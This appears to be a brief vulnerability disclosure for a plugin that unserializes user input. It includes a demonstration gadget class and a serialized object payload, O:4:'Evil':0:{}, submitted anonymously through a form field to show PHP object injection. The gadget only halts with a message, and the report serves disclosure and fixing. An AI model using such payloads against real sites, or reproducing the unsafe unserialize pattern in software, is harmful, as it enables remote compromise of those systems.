The plugin unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
1. Active this plugin and create a simple form.
2. Embed form in existing page.
3. Use anonymous user to fill in the text field with O:4:"Evil":0:{} and submit that form.
4. You will see the "Arbitrary deserialization" result.